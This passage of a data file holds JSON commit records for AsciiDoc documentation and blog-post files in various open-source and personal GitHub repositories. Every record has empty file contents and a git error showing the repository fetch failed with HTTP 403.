I2563252636191b35103c3d01ffc31f0924ea28b1\nSigned-off-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7523\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25c56f7aa0e1652d565ed372b4b10cf99b733141","subject":"New strerror document.","message":"New strerror document.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/nng_strerror.adoc","new_file":"docs\/nng_strerror.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eae6baadde499437cb8342fa0d8aabf3f707fef6","subject":"Update 2015-04-20-Reception-et-montage-des-pieces.adoc","message":"Update 2015-04-20-Reception-et-montage-des-pieces.adoc","repos":"Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io","old_file":"_posts\/2015-04-20-Reception-et-montage-des-pieces.adoc","new_file":"_posts\/2015-04-20-Reception-et-montage-des-pieces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fendi-project\/fendi-project.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34dab8da2c24c4e24bea2efe407ff81d4c396e13","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b96bacfcaf7d34a44ff797cf03c94554cff5aa1","subject":"Update 2017-10-02-Kisa-Kisa-2.adoc","message":"Update 2017-10-02-Kisa-Kisa-2.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5872654a2d4a0527e0bf1d50b6eb501aa06576b3","subject":"Add initial document on library usage.","message":"Add initial document on library usage.\n","repos":"Yubico\/yubikey-manager,Yubico\/yubikey-manager","old_file":"doc\/Library_Usage.adoc","new_file":"doc\/Library_Usage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-manager.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"96b4cb0c53074a7b589efedc8c1550dc42fa1df0","subject":"Update 2016-07-16-Mormans.adoc","message":"Update 2016-07-16-Mormans.adoc","repos":"gorjason\/gorjason.github.io,gorjason\/gorjason.github.io,gorjason\/gorjason.github.io,gorjason\/gorjason.github.io","old_file":"_posts\/2016-07-16-Mormans.adoc","new_file":"_posts\/2016-07-16-Mormans.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gorjason\/gorjason.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"835c84e7eb07e970362677fae4b0f61a6ec3210e","subject":"Update 2016-08-26-dfsdfsd.adoc","message":"Update 2016-08-26-dfsdfsd.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"_posts\/2016-08-26-dfsdfsd.adoc","new_file":"_posts\/2016-08-26-dfsdfsd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"568e834740dc62423941ec1d6dba8f880773281a","subject":"Update 2016-08-19-Hello-everybody.adoc","message":"Update 2016-08-19-Hello-everybody.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d424416779d136d15b02e562f723851c31eb1528","subject":"Update 2016-10-21-opensource-paas.adoc","message":"Update 2016-10-21-opensource-paas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-21-opensource-paas.adoc","new_file":"_posts\/2016-10-21-opensource-paas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf23c634b357f44aadb0e1664834af6cb80ae96d","subject":"Publish 2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","message":"Publish 2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","new_file":"2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f54fa5387cb8dc09bc9e8c69bbca28f4b808b5f","subject":"Hawkular Metrics 0.14.0 - Release","message":"Hawkular Metrics 0.14.0 - Release\n","repos":"lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/03\/29\/hawkular-metrics-0.14.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/03\/29\/hawkular-metrics-0.14.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7bb417c6cf6f69f93405545abbe3b1cd31bd932c","subject":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","message":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d98c824c7e1837a24110b11f18264e2feb2775d","subject":"y2b create post Wireless HDMI - Does It Suck?","message":"y2b create post Wireless HDMI - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-22-Wireless-HDMI--Does-It-Suck.adoc","new_file":"_posts\/2017-03-22-Wireless-HDMI--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac24be9f2106d949c2331e7d4115ccddcd1b041e","subject":"Update 2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","message":"Update 2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ae161198f8dffca4ef6c3405fadf6be16ceb1be","subject":"Update 2016-02-05-A-few-introductions-are-in-order.adoc","message":"Update 2016-02-05-A-few-introductions-are-in-order.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-05-A-few-introductions-are-in-order.adoc","new_file":"_posts\/2016-02-05-A-few-introductions-are-in-order.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89421853750e79aececbc702e7743853f36cb92e","subject":"y2b create post They Say It's The World's Smallest...","message":"y2b create post They Say It's The World's Smallest...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-28-They-Say-Its-The-Worlds-Smallest.adoc","new_file":"_posts\/2017-06-28-They-Say-Its-The-Worlds-Smallest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f7841b894aa009c913ad202eabe660e5dd29c9b","subject":"MAMs sample for creating master clips","message":"MAMs sample for creating master clips\n","repos":"Cinegy\/Demo,Cinegy\/Demo,Cinegy\/Demo","old_file":"MAMs.Samples\/CreateMasterClip.asciidoc","new_file":"MAMs.Samples\/CreateMasterClip.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cinegy\/Demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"237dc1fa4d6f6e1ecb6ea571f2d6db72c99d903c","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced02859d55163884b845710bae580e2cdd2288f","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69df7d388b2c32482c32b4271e4b7e2a4ac6f2ac","subject":"Component docs","message":"Component docs\n","repos":"punkhorn\/camel-upstream,apache\/camel,davidkarlsen\/camel,jamesnetherton\/camel,akhettar\/camel,gnodet\/camel,zregvart\/camel,objectiser\/camel,tadayosi\/camel,anton-k11\/camel,gautric\/camel,DariusX\/camel,cunningt\/camel,tlehoux\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,gnodet\/camel,tadayosi\/camel,mcollovati\/camel,pmoerenhout\/camel,kevinearls\/camel,adessaigne\/camel,kevinearls\/camel,tadayosi\/camel,objectiser\/camel,anton-k11\/camel,christophd\/camel,isavin\/camel,pmoerenhout\/camel,pkletsko\/camel,rmarting\/camel,acartapanis\/camel,drsquidop\/camel,curso007\/camel,davidkarlsen\/camel,pmoerenhout\/camel,jamesnetherton\/camel,yuruki\/camel,alvinkwekel\/camel,snurmine\/camel,christophd\/camel,CodeSmell\/camel,drsquidop\/camel,apache\/camel,jamesnetherton\/camel,pkletsko\/camel,Thopap\/camel,curso007\/camel,anton-k11\/camel,snurmine\/camel,adessaigne\/camel,jonmcewen\/camel,drsquidop\/camel,anoordover\/camel,anoordover\/camel,tlehoux\/camel,christophd\/camel,tlehoux\/camel,nikhilvibhav\/camel,nboukhed\/camel,acartapanis\/camel,mgyongyosi\/camel,christophd\/camel,zregvart\/camel,Thopap\/camel,davidkarlsen\/camel,curso007\/camel,dmvolod\/camel,kevinearls\/camel,jonmcewen\/camel,onders86\/camel,rmarting\/camel,nboukhed\/camel,curso007\/camel,dmvolod\/camel,scranton\/camel,yuruki\/camel,tdiesler\/camel,Fabryprog\/camel,zregvart\/camel,gnodet\/camel,salikjan\/camel,mcollovati\/camel,pkletsko\/camel,ullgren\/camel,yuruki\/camel,tlehoux\/camel,alvinkwekel\/camel,nboukhed\/camel,gnodet\/camel,akhettar\/camel,DariusX\/camel,nicolaferraro\/camel,Thopap\/camel,salikjan\/camel,tdiesler\/camel,scranton\/camel,Thopap\/camel,akhettar\/camel,gautric\/camel,alvinkwekel\/camel,acartapanis\/camel,kevinearls\/camel,yuruki\/camel,pax95\/camel,pkletsko\/camel,punkhorn\/camel-upstream,mgyongyosi\/camel,dmvolod\/camel,onders86\/camel,adessaigne\/camel,pkletsko\/camel,acartapanis\/camel,onders86\/camel,anoordover\/camel,pax95\/camel,pmoerenhout\/camel,isavin\/camel,prashant2402\/camel,apache\/camel,nboukhed\/camel,gautric\/camel,nicolaferraro\/camel,tdiesler\/camel,onders86\/camel,mgyongyosi\/camel,jonmcewen\/camel,ullgren\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,tdiesler\/camel,Fabryprog\/camel,nikhilvibhav\/camel,rmarting\/camel,cunningt\/camel,scranton\/camel,mgyongyosi\/camel,sverkera\/camel,prashant2402\/camel,rmarting\/camel,prashant2402\/camel,pax95\/camel,Fabryprog\/camel,rmarting\/camel,nicolaferraro\/camel,pmoerenhout\/camel,christophd\/camel,sverkera\/camel,drsquidop\/camel,objectiser\/camel,pmoerenhout\/camel,cunningt\/camel,anton-k11\/camel,CodeSmell\/camel,scranton\/camel,pkletsko\/camel,adessaigne\/camel,jonmcewen\/camel,onders86\/camel,CodeSmell\/camel,nboukhed\/camel,isavin\/camel,snurmine\/camel,cunningt\/camel,mcollovati\/camel,sverkera\/camel,mgyongyosi\/camel,onders86\/camel,akhettar\/camel,prashant2402\/camel,gnodet\/camel,isavin\/camel,anton-k11\/camel,jamesnetherton\/camel,prashant2402\/camel,gautric\/camel,jamesnetherton\/camel,yuruki\/camel,Thopap\/camel,davidkarlsen\/camel,curso007\/camel,tadayosi\/camel,isavin\/camel,curso007\/camel,mcollovati\/camel,scranton\/camel,anton-k11\/camel,dmvolod\/camel,tdiesler\/camel,Fabryprog\/camel,akhettar\/camel,isavin\/camel,cunningt\/camel,rmarting\/camel,jonmcewen\/camel,punkhorn\/camel-upstream,apache\/camel,acartapanis\/camel,sverkera\/camel,kevinearls\/camel,objectiser\/camel,mgyongyosi\/camel,sverkera\/camel,DariusX\/camel,anoordover\/camel,Thopap\/camel,DariusX\/camel,gautric\/camel,sverkera\/camel,apache\/camel,anoordover\/camel,dmvolod\/camel,akhettar\/camel,scranton\/camel,acartapanis\/camel,tlehoux\/camel,tdiesler\/camel,nboukhed\/camel,CodeSmell\/camel,anoordover\/camel,cunningt\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,prashant2402\/camel,tadayosi\/camel,nicolaferraro\/camel,drsquidop\/camel,ullgren\/camel,yuruki\/camel,snurmine\/camel,snurmine\/camel,zregvart\/camel,kevinearls\/camel,dmvolod\/camel,nikhilvibhav\/camel,drsquidop\/camel,pax95\/camel,ullgren\/camel,alvinkwekel\/camel,tlehoux\/camel,gautric\/camel,snurmine\/camel,punkhorn\/camel-upstream,jonmcewen\/camel","old_file":"components\/camel-spring-dm\/src\/main\/docs\/spring-dm.adoc","new_file":"components\/camel-spring-dm\/src\/main\/docs\/spring-dm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63fdc0c9f49e55ac043c9ba25e9b755b696d405d","subject":"[docs] Python updates for development page","message":"[docs] Python updates for development page\n\nUpdates to the Developing Applications with Kudu page for Python.\nAdditionally, this updates some of the github example references.\n\nChange-Id: I028e86b6bc35f36fd1a4752b52463f5d0fd75f76\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4586\nReviewed-by: David Ribeiro Alves <78b9f953b197533e9b51c860b080869056433b48@apache.org>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a7f6e693b6df63d8d9671030c794a59bf3679b17","subject":"zsh: Add an `installation` section to the readme","message":"zsh: Add an `installation` section to the readme\n\nThis section explains how to install the configuration and what steps to\ntake in order to work with other configurations (such as creating the\n$HOME\/.config folder first so the .config\/zsh folder is linked\ncorrectly).\n","repos":"PigeonF\/.dotfiles","old_file":"zsh\/README.adoc","new_file":"zsh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac7cf6a1eeca37f88f0c7a7a95496ecd3c1abe0c","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a4ca17290d386f9c91baa9002ac02cccd8e5a4d","subject":"add MIT license","message":"add MIT license\n","repos":"mattdrees\/patchkit","old_file":"LICENSE.asciidoc","new_file":"LICENSE.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattdrees\/patchkit.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eb5ae5ac06502e12d3085730c033c7eb1425680","subject":"Create Vim.adoc","message":"Create Vim.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Windows\/Vim.adoc","new_file":"Windows\/Vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a57bdad3e4aa3c105c2b8158b835fd4108bdd0ba","subject":"Add CHANGELOG starting with v0.0.9 release.","message":"Add CHANGELOG starting with v0.0.9 release.","repos":"msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msgilligan\/bitcoinj-addons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ca7d0ceb8b61fa3ef27ed776ced81467d0d40f4","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e083df4daf714102bf5f658adcedc336a2459f5","subject":"Update 2012-11-09-google-cloud-endpoints.adoc","message":"Update 2012-11-09-google-cloud-endpoints.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"687337b893a5822ac52380309aad789d392f2239","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbe6593c4bb97e01b2f5726c68f77c3a4d406a06","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"380b45b96590a313507f26ff2b0e3a2af54f4706","subject":"Improve docs for search preferences (#32159)","message":"Improve docs for search preferences (#32159)\n\nToday it is unclear what guarantees are offered by the search preference\r\nfeature, and we claim a guarantee that is stronger than what we really offer:\r\n\r\n> A custom value will be used to guarantee that the same shards will be used\r\n> for the same custom value.\r\n\r\nThis commit clarifies this documentation.\r\n\r\nForward-port of #32098 to `master`.","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/search\/request\/preference.asciidoc","new_file":"docs\/reference\/search\/request\/preference.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75ac029f5a8f18ff42ef33644876f063e9981031","subject":"Fix wrong method name in Grid docs (#10171)","message":"Fix wrong method name in Grid docs (#10171)\n\n","repos":"asashour\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework","old_file":"documentation\/components\/components-grid.asciidoc","new_file":"documentation\/components\/components-grid.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"646410e9079220e26b39eacb954f8bb1c995f319","subject":"Update 2016-02-20-Test-Blog-using-Ascii-Doctor.adoc","message":"Update 